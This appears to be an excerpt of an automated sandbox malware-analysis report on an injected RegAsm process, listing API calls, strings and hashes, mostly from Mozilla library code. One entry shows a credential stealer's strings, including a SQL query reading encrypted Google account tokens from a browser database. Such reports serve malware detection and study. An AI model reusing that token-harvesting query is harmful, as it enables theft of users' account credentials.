                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,00000000,?,6C71DEFD), ref: 6C72DDCF
                                                                                                                                                                                                                                                      • Part of subcall function 6C70FA00: ReleaseSRWLockExclusive.KERNEL32(?,?,6C6E5407), ref: 6C70FA4B
                                                                                                                                                                                                                                                      • Part of subcall function 6C7290E0: free.MOZGLUE(00000000,00000000,00000000,?,6C72B6F6,?,?,?,?,?,6C72B127), ref: 6C7290FF
                                                                                                                                                                                                                                                      • Part of subcall function 6C7290E0: free.MOZGLUE(?,00000000,00000000,?,6C72B6F6,?,?,?,?,?,6C72B127), ref: 6C729108
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,00000000,?,6C71DEFD), ref: 6C72DE0D
                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000,?,?,00000000,00000000,?,6C71DEFD), ref: 6C72DE41
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,00000000,?,6C71DEFD), ref: 6C72DE5F
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,00000000,?,6C71DEFD), ref: 6C72DEA3
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,00000000,?,6C71DEFD), ref: 6C72DEE9
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C71DEFD), ref: 6C72DF32
                                                                                                                                                                                                                                                      • Part of subcall function 6C72DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?,?,00000000,?,?,?,6C72DF7F,?,?,00000000,00000000,?,6C71DEFD), ref: 6C72DB86
                                                                                                                                                                                                                                                      • Part of subcall function 6C72DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?,?,?,?,00000000,?,?,?,6C72DF7F,?,?,00000000,00000000), ref: 6C72DC0E
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C71DEFD), ref: 6C72DF65
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,00000000,00000000,?,6C71DEFD), ref: 6C72DF80
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C6F5EDB
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5E90: memset.VCRUNTIME140(ewsl,000000E5,?), ref: 6C6F5F27
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C6F5FB2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 112305417-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6C735C8C,?,6C70E829), ref: 6C735D32
                                                                                                                                                                                                                                                    • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6C735C8C,?,6C70E829), ref: 6C735D62
                                                                                                                                                                                                                                                    • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6C735C8C,?,6C70E829), ref: 6C735D6D
                                                                                                                                                                                                                                                    • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6C735C8C,?,6C70E829), ref: 6C735D84
                                                                                                                                                                                                                                                    • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6C735C8C,?,6C70E829), ref: 6C735DA4
                                                                                                                                                                                                                                                    • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6C735C8C,?,6C70E829), ref: 6C735DC9
                                                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 6C735DDB
                                                                                                                                                                                                                                                    • ??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6C735C8C,?,6C70E829), ref: 6C735E00
                                                                                                                                                                                                                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6C735C8C,?,6C70E829), ref: 6C735E45
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2325513730-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C6D31A7), ref: 6C70CDDD
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                                                                                    • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                                                                                                                    • API String ID: 4275171209-2186867486
                                                                                                                                                                                                                                                    • Opcode ID: 5af3c448011d9c9e25d139491d94dfcc69d47d3d19bddc9809a3940254eff153
                                                                                                                                                                                                                                                    • Instruction ID: 3fb9853082adb8e97c9ef7486d6ccaacbf9e8d6e4800a564f480425dbe6e18db
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5af3c448011d9c9e25d139491d94dfcc69d47d3d19bddc9809a3940254eff153
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F631A7B17402095BFF10AFA58E45BAE7BB9AB41719F744428F610EBAC0DF71E50087B2
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C6DF100: LoadLibraryW.KERNEL32(shell32,?,6C74D020), ref: 6C6DF122
                                                                                                                                                                                                                                                      • Part of subcall function 6C6DF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C6DF132
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000012), ref: 6C6DED50
                                                                                                                                                                                                                                                    • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6DEDAC
                                                                                                                                                                                                                                                    • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C6DEDCC
                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32 ref: 6C6DEE08
                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C6DEE27
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C6DEE32
                                                                                                                                                                                                                                                      • Part of subcall function 6C6DEB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C6DEBB5
                                                                                                                                                                                                                                                      • Part of subcall function 6C6DEB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C70D7F3), ref: 6C6DEBC3
                                                                                                                                                                                                                                                      • Part of subcall function 6C6DEB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C70D7F3), ref: 6C6DEBD6
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • \Mozilla\Firefox\SkeletonUILock-, xrefs: 6C6DEDC1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
                                                                                                                                                                                                                                                    • String ID: \Mozilla\Firefox\SkeletonUILock-
                                                                                                                                                                                                                                                    • API String ID: 1980384892-344433685
                                                                                                                                                                                                                                                    • Opcode ID: 3cc81d15abcbdd1ccbaf4dedfb092ba7a6339506ca902511eb799f041bc01aed
                                                                                                                                                                                                                                                    • Instruction ID: 3fa3afce1dca83340e346515ab7f59cd5aec37603700634a741b3afd7a1853b1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3cc81d15abcbdd1ccbaf4dedfb092ba7a6339506ca902511eb799f041bc01aed
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4851DF71D052098BDB00DF68C9446EEF7F1AF5A318F45842DE8556B780EB30B949C7EA
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C74A565
                                                                                                                                                                                                                                                      • Part of subcall function 6C74A470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C74A4BE
                                                                                                                                                                                                                                                      • Part of subcall function 6C74A470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C74A4D6
                                                                                                                                                                                                                                                    • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C74A65B
                                                                                                                                                                                                                                                    • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C74A6B6
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
                                                                                                                                                                                                                                                    • String ID: 0$z
                                                                                                                                                                                                                                                    • API String ID: 310210123-2584888582
                                                                                                                                                                                                                                                    • Opcode ID: d5e99468fbcc1ac6dc5490df98da2361582c791597010a04e06caec1f8cf0ae8
                                                                                                                                                                                                                                                    • Instruction ID: babbcfdeb81156563db7a4050574b39d0d8cf314be72d1076f2363646bbb1ff6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d5e99468fbcc1ac6dc5490df98da2361582c791597010a04e06caec1f8cf0ae8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C411575A087459FC341DF28C580A9ABBE5BF89354F508A3EF49987650EB30E649CB83
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcpy.KERNEL32(00000000), ref: 0040FE63
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcat.KERNEL32(?,00000000), ref: 0040FE6F
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                      • Part of subcall function 00406FF0: memcmp.MSVCRT ref: 0040702B
                                                                                                                                                                                                                                                      • Part of subcall function 00406FF0: memset.MSVCRT ref: 00407059
                                                                                                                                                                                                                                                      • Part of subcall function 00406FF0: LocalAlloc.KERNEL32(00000040,?), ref: 00407090
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00408EF5
                                                                                                                                                                                                                                                      • Part of subcall function 00411590: LocalAlloc.KERNEL32(00000040,00413AC1,?,00000001,00000004,?,00413AC0,00000000,00000000), ref: 004115AC
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,AccountId), ref: 00408F1B
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00409004
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00409018
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpylstrlen$AllocLocallstrcat$memcmpmemset
                                                                                                                                                                                                                                                    • String ID: AccountId$GoogleAccounts$GoogleAccounts$SELECT service, encrypted_token FROM token_service
                                                                                                                                                                                                                                                    • API String ID: 2910778473-1713091031
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,6C75008B), ref: 6C6D7B89
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,6C75008B), ref: 6C6D7BAC
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D78C0: free.MOZGLUE(?,6C75008B), ref: 6C6D7BCF
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,6C75008B), ref: 6C6D7BF2
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C6F5EDB
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5E90: memset.VCRUNTIME140(ewsl,000000E5,?), ref: 6C6F5F27
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C6F5FB2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: free$CriticalSection$EnterLeavememset
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3977402767-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C71945E
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719470
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719482
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: __Init_thread_footer.LIBCMT ref: 6C71949F
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71DF7D
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71DF8A
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71DFC9
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71DFF7
                                                                                                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C71E000
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • <none>, xrefs: 6C71DFD7
                                                                                                                                                                                                                                                    • [I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6C71E00E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease_getpid
                                                                                                                                                                                                                                                    • String ID: <none>$[I %d/%d] profiler_set_process_name("%s", "%s")
                                                                                                                                                                                                                                                    • API String ID: 1430161788-1978395012
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C70AB89: EnterCriticalSection.KERNEL32(6C75E370,?,?,?,6C6D34DE,6C75F6CC,?,?,?,?,?,?,?,6C6D3284), ref: 6C70AB94
                                                                                                                                                                                                                                                      • Part of subcall function 6C70AB89: LeaveCriticalSection.KERNEL32(6C75E370,?,6C6D34DE,6C75F6CC,?,?,?,?,?,?,?,6C6D3284,?,?,6C6F56F6), ref: 6C70ABD1
                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C71945E
                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719470
                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719482
                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C71949F
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C719459
                                                                                                                                                                                                                                                    • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C71946B
                                                                                                                                                                                                                                                    • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C71947D
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
                                                                                                                                                                                                                                                    • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
                                                                                                                                                                                                                                                    • API String ID: 4042361484-1628757462
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C720F6B
                                                                                                                                                                                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C720F88
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C720FF7
                                                                                                                                                                                                                                                    • InitializeConditionVariable.KERNEL32(?), ref: 6C721067
                                                                                                                                                                                                                                                    • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6C7210A7
                                                                                                                                                                                                                                                    • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6C72114B
                                                                                                                                                                                                                                                      • Part of subcall function 6C718AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C7212F7), ref: 6C718BD5
                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C721174
                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C721186
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2803333873-0
                                                                                                                                                                                                                                                    • Opcode ID: ac8ba6d72e854658a728f8495ed8c326ac840398fcc23bbc57cdac91dce1806c
                                                                                                                                                                                                                                                    • Instruction ID: d104853a22cd7c941e4d2d5044339edea5502fc94ca71c34a49b0ef94c2e54c2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac8ba6d72e854658a728f8495ed8c326ac840398fcc23bbc57cdac91dce1806c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C761F375A043449FDB10CF25CA98BAAB7F6BFC5308F14892DE89947711EB35E849CB81
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(?,?,?,6C6E1999), ref: 6C6DEA39
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,7FFFFFFE), ref: 6C6DEA5C
